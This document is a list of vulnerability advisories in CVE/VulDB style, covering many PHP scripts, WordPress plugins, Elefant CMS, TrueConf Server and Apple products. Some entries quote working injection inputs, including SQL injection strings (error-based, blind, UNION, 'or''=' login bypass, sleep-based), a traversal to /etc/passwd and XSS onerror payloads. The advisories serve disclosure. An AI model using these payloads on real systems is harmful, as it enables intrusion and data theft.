An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "libxslt" component. It allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves nghttp2 before 1.17.0 in the "HTTPProtocol" component. It allows remote HTTP/2 servers to have an unspecified impact via unknown vectors.
A vulnerability was found in LUNAD3v AreaLoad up to 1a1103182ed63a06dde63d1712f3262eda19c3ec. It has been rated as critical. This issue affects some unknown processing of the file request.php. The manipulation of the argument phone leads to sql injection. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 264813c546dba03989ac0fc365f2022bf65e3be2. It is recommended to apply a patch to fix this issue.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Fuzzy SWMP. It has been rated as problematic. This issue affects some unknown processing of the file swmp.php of the component GET Parameter Handler. The manipulation of the argument theme leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 792bcab637cb8c3bd251d8fc8771512c5329a93e. It is recommended to apply a patch to fix this issue. The identifier VDB-230669 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as critical was found in hgzojer Vocable Trainer up to 1.3.0 on Android. This vulnerability affects unknown code of the file src/at/hgz/vocabletrainer/VocableTrainerProvider.java. The manipulation leads to path traversal. Attacking locally is a requirement. Upgrading to version 1.3.1 is able to address this issue. The name of the patch is accf6838078f8eb105cfc7865aba5c705fb68426. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222328.
A vulnerability was found in InSTEDD Pollit 2.3.1. It has been rated as critical. This issue affects the function TourController of the file app/controllers/tour_controller.rb. The manipulation leads to an unknown weakness. The attack may be initiated remotely. Upgrading to version 2.3.2 is able to address this issue. The patch is named 6ef04f8b5972d5f16f8b86f8b53f62fac68d5498. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221507.
A vulnerability classified as problematic was found in ciubotaru share-on-diaspora 0.7.9. This vulnerability affects unknown code of the file new_window.php. The manipulation of the argument title/url leads to cross site scripting. The attack can be initiated remotely. The name of the patch is fb6fae2f8a9b146471450b5b0281046a17d1ac8d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-220204.
A vulnerability classified as problematic has been found in DaSchTour matomo-mediawiki-extension up to 2.4.2 on MediaWiki. This affects an unknown part of the file Piwik.hooks.php of the component Username Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 2.4.3 is able to address this issue. The patch is named 681324e4f518a8af4bd1f93867074c728eb9923d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220203.
A vulnerability was found in bastianallgeier Kirby Webmentions Plugin and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The patch is identified as 55bedea78ae9af916a9a41497bd9996417851502. It is recommended to apply a patch to fix this issue. VDB-218894 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in PrivateSky apersistence. This affects an unknown part of the file db/sql/mysqlUtils.js. The manipulation leads to sql injection. The identifier of the patch is 954425f61634b556fe644837a592a5b8fcfca068. It is recommended to apply a patch to fix this issue. The identifier VDB-218457 was assigned to this vulnerability.
A vulnerability was found in ollpu parontalli. It has been classified as critical. Affected is an unknown function of the file httpdocs/index.php. The manipulation of the argument s leads to sql injection. The patch is identified as 6891bb2dec57dca6daabc15a6d2808c8896620e5. It is recommended to apply a patch to fix this issue. VDB-218418 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in GGGGGGGG ToN-MasterServer. Affected by this issue is some unknown functionality of the file public_html/irc_updater/svr_request_pub.php. The manipulation leads to sql injection. The patch is identified as 3a4c7e6d51bf95760820e3245e06c6e321a7168a. It is recommended to apply a patch to fix this issue. VDB-218306 is the identifier assigned to this vulnerability.
A vulnerability was found in jfm-so piWallet. It has been rated as critical. Affected by this issue is some unknown functionality of the file api.php. The manipulation of the argument key leads to sql injection. The patch is identified as b420f8c4cbe7f06a34d1b05e90ee5cdfe0aa83bb. It is recommended to apply a patch to fix this issue. VDB-218006 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Minichan. This affects an unknown part of the file reports.php. The manipulation of the argument headline leads to cross site scripting. It is possible to initiate the attack remotely. The identifier of the patch is fc0e732e58630cba318d6bf49d1388a7aa9d390e. It is recommended to apply a patch to fix this issue. The identifier VDB-217785 was assigned to this vulnerability.
A vulnerability was found in flitto express-param up to 0.x. It has been classified as critical. This affects an unknown part of the file lib/fetchParams.js. The manipulation leads to improper handling of extra parameters. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The identifier of the patch is db94f7391ad0a16dcfcba8b9be1af385b25c42db. It is recommended to upgrade the affected component. The identifier VDB-217149 was assigned to this vulnerability.
A vulnerability was found in rf Keynote up to 0.x on Rails. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/keynote/rumble.rb. The manipulation of the argument value leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.0.0 is able to address this issue. The patch is identified as 05be4356b0a6ca7de48da926a9b997beb5ffeb4a. It is recommended to upgrade the affected component. VDB-217142 is the identifier assigned to this vulnerability.
A vulnerability was found in Ariadne Component Library up to 2.x. It has been classified as critical. Affected is an unknown function of the file src/url/Url.php. The manipulation leads to server-side request forgery. Upgrading to version 3.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217140.
A vulnerability was found in Exciting Printer and classified as critical. This issue affects some unknown processing of the file lib/printer/jobs/prepare_page.rb of the component Argument Handler. The manipulation of the argument URL leads to command injection. The patch is named 5f8c715d6e2cc000f621a6833f0a86a673462136. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217139.
A vulnerability was found in Sterc Google Analytics Dashboard for MODX up to 1.0.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file core/components/analyticsdashboardwidget/elements/tpl/widget.analytics.tpl of the component Internal Search. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.0.6 is able to address this issue. The identifier of the patch is 855d9560d3782c105568eedf9b22a769fbf29cc0. It is recommended to upgrade the affected component. The identifier VDB-217069 was assigned to this vulnerability.
A vulnerability has been found in aerouk imageserve and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument REQUEST_URI leads to cross site scripting. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 2ac3cd4f90b4df66874fab171376ca26868604c4. It is recommended to apply a patch to fix this issue. The identifier VDB-217057 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in aerouk imageserve. Affected is an unknown function of the file public/viewer.php of the component File Handler. The manipulation of the argument filelocation leads to path traversal. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is bd23c784f0e5cb12f66d15c100248449f87d72e2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217056.
A vulnerability classified as problematic was found in iText RUPS. This vulnerability affects unknown code of the file src/main/java/com/itextpdf/rups/model/XfaFile.java. The manipulation leads to xml external entity reference. The patch is identified as ac5590925874ef810018a6b60fec216eee54fb32. It is recommended to apply a patch to fix this issue. VDB-217054 is the identifier assigned to this vulnerability.
A vulnerability was found in challenge website. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is f1644b1d3502e5aa5284f31ea80d2623817f4d42. It is recommended to apply a patch to fix this issue. The identifier VDB-216989 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Itech Movie Portal Script 7.36. This issue affects some unknown processing of the file /film-rating.php. The manipulation of the argument v leads to sql injection (Error). The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Itech Movie Portal Script 7.36. This vulnerability affects unknown code of the file /artist-display.php. The manipulation of the argument act leads to sql injection (Union). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Itech Movie Portal Script 7.36. This affects an unknown part of the file /movie.php. The manipulation of the argument f leads to sql injection (Union). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Itech Movie Portal Script 7.36. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /movie.php. The manipulation of the argument f with the input &lt;img src=i onerror=prompt(1)&gt; leads to basic cross site scripting (Reflected). The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Itech Movie Portal Script 7.36. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /show_news.php. The manipulation of the argument id with the input AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) leads to sql injection (Error). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Itech Auction Script 6.49. It has been classified as critical. This affects an unknown part of the file /mcategory.php. The manipulation of the argument mcid with the input 4' AND 1734=1734 AND 'Ggks'='Ggks leads to sql injection (Blind). It is possible to initiate the attack remotely.
A vulnerability was found in Itech B2B Script 4.28. It has been rated as critical. This issue affects some unknown processing of the file /catcompany.php. The manipulation of the argument token with the input 704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Itech Classifieds Script 7.27. Affected is an unknown function of the file /subpage.php. The manipulation of the argument scat with the input =51' AND 4941=4941 AND 'hoCP'='hoCP leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Itech Dating Script 3.26. Affected by this vulnerability is an unknown functionality of the file /see_more_details.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Itech Freelancer Script 5.13. Affected by this issue is some unknown functionality of the file /category.php. The manipulation of the argument sk leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Itech Job Portal Script 9.13. This affects an unknown part of the file /admin. The manipulation leads to improper authentication. It is possible to initiate the attack remotely.
A vulnerability was found in Itech Multi Vendor Script 6.49 and classified as critical. This issue affects some unknown processing of the file /multi-vendor-shopping-script/product-list.php. The manipulation of the argument pl leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Itech News Portal 6.28. It has been classified as critical. Affected is an unknown function of the file /news-portal-script/information.php. The manipulation of the argument inf leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Itech Real Estate Script 3.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /real-estate-script/search_property.php. The manipulation of the argument property_for leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in LogoStore. It has been classified as critical. Affected is an unknown function of the file /LogoStore/search.php. The manipulation of the argument query with the input test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&amp;search= leads to sql injection. It is possible to launch the attack remotely.
A vulnerability has been found in KB Messages PHP Script 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username/password with the input 'or''=' leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in KB Login Authentication Script 1.1 and classified as critical. Affected by this issue is some unknown functionality. The manipulation of the argument username/password with the input 'or''=' leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in KB Affiliate Referral Script 1.0. It has been classified as critical. This affects an unknown part of the file /index.php. The manipulation of the argument username/password with the input 'or''=' leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Online Hotel Booking System Pro 1.2. Affected by this vulnerability is an unknown functionality of the file /roomtype-details.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Online Hotel Booking System Pro Plugin 1.0. Affected is an unknown function of the file /front/roomtype-details.php. The manipulation of the argument tid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Viscosity 1.6.7. It has been classified as critical. This affects an unknown part of the component DLL Handler. The manipulation leads to untrusted search path. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.8 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic was found in Bitrix Site Manager 12.06.2015. Affected by this vulnerability is an unknown functionality of the component Contact Form. The manipulation of the argument text with the input &lt;img src="http://1"; on onerror="$(&amp;#8217;p').text(&amp;#8217;Hacked&amp;#8217;)" /&gt; leads to basic cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Teradici Management Console 2.2.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Database Management. The manipulation leads to improper privilege management. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in TrueConf Server 4.3.7. This affects an unknown part of the file /admin/general/change-lang. The manipulation of the argument redirect_url leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in TrueConf Server 4.3.7. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/conferences/list/. The manipulation of the argument domxss leads to basic cross site scripting (DOM). The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in TrueConf Server 4.3.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/group. The manipulation leads to basic cross site scripting (DOM). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in TrueConf Server 4.3.7. It has been classified as problematic. Affected is an unknown function of the file /admin/group/list/. The manipulation of the argument checked_group_id leads to basic cross site scripting (Reflected). It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in TrueConf Server 4.3.7 and classified as problematic. This issue affects some unknown processing of the file /admin/conferences/list/. The manipulation of the argument sort leads to basic cross site scripting (Reflected). The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in TrueConf Server 4.3.7 and classified as problematic. This vulnerability affects unknown code of the file /admin/conferences/get-all-status/. The manipulation of the argument keys[] leads to basic cross site scripting (Reflected). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in TrueConf Server 4.3.7. This affects an unknown part. The manipulation leads to basic cross site scripting (Stored). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in IVPN Client 2.6.6120.33863 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument --up cmd leads to improper privilege management. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 2.6.2 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, was found in Teleopti WFM 7.1.0. This affects an unknown part of the component Administration. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability, which was classified as problematic, has been found in Teleopti WFM up to 7.1.0. Affected by this issue is some unknown functionality of the component Administration. The manipulation as part of JSON leads to information disclosure (Credentials). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability classified as problematic was found in Teleopti WFM up to 7.1.0. Affected by this vulnerability is an unknown functionality of the file /TeleoptiWFM/Administration/GetOneTenant of the component Administration. The manipulation leads to information disclosure (Credentials). The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability classified as problematic has been found in Easy Table Plugin 1.6. This affects an unknown part of the file /wordpress/wp-admin/options-general.php. The manipulation with the input "&gt;&lt;script&gt;alert(1)&lt;/script&gt; leads to basic cross site scripting. It is possible to initiate the attack remotely.
A vulnerability, which was classified as problematic, was found in ShadeYouVPN.com Client 2.0.1.11. Affected is an unknown function. The manipulation leads to improper privilege management. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.1.12 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, has been found in Lithium Forum 2017 Q1. This issue affects some unknown processing of the component Compose Message Handler. The manipulation of the argument upload_url leads to server-side request forgery. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Simplessus 3.7.7. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument path with the input ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.8.3 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Simplessus 3.7.7. It has been declared as critical. This vulnerability affects unknown code of the component Cookie Handler. The manipulation of the argument UWA_SID leads to sql injection (Time). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.8.3 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as critical has been found in Kama Click Counter Plugin up to 3.4.8. This affects an unknown part of the file wp-admin/admin.php. The manipulation of the argument order_by/order with the input ASC%2c(select*from(select(sleep(2)))a) leads to sql injection (Blind). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.4.9 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Album Lock 4.0 and classified as critical. Affected by this issue is some unknown functionality of the file /getImage. The manipulation of the argument filePaht leads to path traversal. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in ProjectSend r754. This affects an unknown part of the file process.php?do=zip_download. The manipulation of the argument client/file leads to information disclosure. It is possible to initiate the attack remotely.
A vulnerability was found in Air Transfer 1.0.14/1.2.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Analytics Stats Counter Statistics Plugin 1.2.2.5 and classified as critical. This issue affects some unknown processing. The manipulation leads to code injection. The attack may be initiated remotely.
A vulnerability was found in Admin Custom Login Plugin 2.4.5.2. It has been classified as problematic. Affected is an unknown function. The manipulation leads to basic cross site scripting (Persistent). It is possible to launch the attack remotely.
A vulnerability was found in WP-Filebase Download Manager Plugin 3.4.4. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely.
A vulnerability classified as problematic has been found in WP-SpamFree Anti-Spam Plugin 2.1.1.4. This affects an unknown part. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely.
A vulnerability classified as critical was found in Simple Ads Manager Plugin. This vulnerability affects unknown code. The manipulation leads to code injection. The attack can be initiated remotely.
A vulnerability, which was classified as problematic, has been found in NewStatPress Plugin 1.2.4. This issue affects some unknown processing. The manipulation leads to basic cross site scripting (Persistent). The attack may be initiated remotely. Upgrading to version 1.2.5 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, was found in Download Manager Plugin 2.8.99. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely.
A vulnerability classified as problematic was found in Google Analytics Dashboard Plugin 2.1.1. Affected by this vulnerability is an unknown functionality. The manipulation leads to basic cross site scripting. The attack can be launched remotely.
A vulnerability was found in File Manager Plugin 3.0.1. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely.
A vulnerability was found in Global Content Blocks Plugin 2.1.5. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely.
A vulnerability was found in Gwolle Guestbook Plugin 1.7.4. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to basic cross site scripting. The attack may be initiated remotely.
A vulnerability classified as problematic has been found in Atahualpa Theme. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely.
A vulnerability, which was classified as problematic, has been found in Alpine PhotoTile for Instagram Plugin 1.2.7.7. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely.
A vulnerability, which was classified as critical, was found in VaultPress Plugin 1.8.4. This affects an unknown part. The manipulation leads to code injection. It is possible to initiate the attack remotely.
A vulnerability has been found in Atahualpa Theme and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to basic cross site scripting. The attack can be launched remotely.
A vulnerability has been found in JUNG Smart Visu Server 1.0.804/1.0.830/1.0.832 and classified as critical. Affected by this vulnerability is an unknown functionality of the component KNX Group Address. The manipulation leads to backdoor. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.900 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, was found in JUNG Smart Visu Server 1.0.804/1.0.830/1.0.832. Affected is an unknown function of the component SSH Server. The manipulation leads to backdoor. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.900 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, has been found in JUNG Smart Visu Server 1.0.804/1.0.830/1.0.832. This issue affects some unknown processing. The manipulation leads to backdoor. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.900 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as critical, was found in Hindu Matrimonial Script. This affects an unknown part of the file /admin/reports.php. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Hindu Matrimonial Script. Affected by this issue is some unknown functionality of the file /admin/googleads.php. The manipulation leads to improper privilege management. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Hindu Matrimonial Script. Affected by this vulnerability is an unknown functionality of the file /admin/photo.php. The manipulation leads to improper privilege management. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Hindu Matrimonial Script. Affected is an unknown function of the file /admin/featured.php. The manipulation leads to improper privilege management. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script. It has been rated as critical. This issue affects some unknown processing of the file /admin/success_story.php. The manipulation leads to improper privilege management. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script. It has been declared as critical. This vulnerability affects unknown code of the file /admin/searchview.php. The manipulation leads to improper privilege management. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script. It has been classified as critical. This affects an unknown part of the file /admin/payment.php. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script and classified as critical. Affected by this issue is some unknown functionality of the file /admin/newsletter1.php. The manipulation leads to improper privilege management. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Hindu Matrimonial Script and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/cms.php. The manipulation leads to improper privilege management. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Hindu Matrimonial Script. Affected is an unknown function of the file /admin/generalsettings.php. The manipulation leads to improper privilege management. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Hindu Matrimonial Script. This issue affects some unknown processing of the file /admin/renewaldue.php. The manipulation leads to improper privilege management. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Hindu Matrimonial Script. This vulnerability affects unknown code of the file /admin/communitymanagement.php. The manipulation leads to improper privilege management. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Hindu Matrimonial Script. This affects an unknown part of the file /admin/countrymanagement.php. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/usermanagement.php. The manipulation leads to improper privilege management. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Hindu Matrimonial Script. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/. The manipulation of the argument username/password with the input 'or''=' leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Adminer Login 1.4.4 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to improper access controls. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Supsystic Popup Plugin 1.7.6 and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Elefant CMS 1.3.12-RC. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /designer/add/layout. The manipulation leads to code injection. The attack can be launched remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Elefant CMS 1.3.12-RC. It has been classified as critical. Affected is an unknown function of the file /filemanager/upload/drop of the component File Upload. The manipulation leads to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Elefant CMS 1.3.12-RC and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability has been found in Elefant CMS 1.3.12-RC and classified as problematic. This vulnerability affects unknown code of the file /admin/extended. The manipulation of the argument name with the input %3Cimg%20src=no%20onerror=alert(1)%3E leads to basic cross site scripting (Reflected). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, was found in Elefant CMS 1.3.12-RC. This affects an unknown part of the component Blog Post Handler. The manipulation leads to basic cross site scripting (Persistent). It is possible to initiate the attack remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability, which was classified as problematic, has been found in Elefant CMS 1.3.12-RC. Affected by this issue is some unknown functionality of the component Title Handler. The manipulation with the input &lt;/title&gt;&lt;img src=no onerror=alert(1)&gt; leads to basic cross site scripting (Persistent). The attack may be launched remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic was found in Elefant CMS 1.3.12-RC. Affected by this vulnerability is an unknown functionality of the component Version Comparison. The manipulation leads to basic cross site scripting (Persistent). The attack can be launched remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as problematic has been found in Elefant CMS 1.3.12-RC. Affected is an unknown function. The manipulation of the argument username leads to basic cross site scripting (Persistent). It is possible to launch the attack remotely. Upgrading to version 1.3.13 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in weblizar User Login Log Plugin 2.2.1. It has been classified as problematic. Affected is an unknown function. The manipulation leads to basic cross site scripting (Stored). It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in BestWebSoft Contact Form Plugin 4.0.0. This affects an unknown part. The manipulation leads to basic cross site scripting (Stored). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0.2 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in XYZScripts Contact Form Manager Plugin. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in XYZScripts Contact Form Manager Plugin. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in Python 2.7.13. This vulnerability affects unknown code of the component pgAdmin4. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in InnoSetup Installer. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to uncontrolled search path. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, was found in legacy Axis devices such as P3225 and M3005. This affects an unknown part of the component CGI Script. The manipulation leads to improper privilege management. It is possible to initiate the attack remotely.
A vulnerability was found in Navetti PricePoint 4.6.0.0. It has been declared as critical. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgrade the affected component.
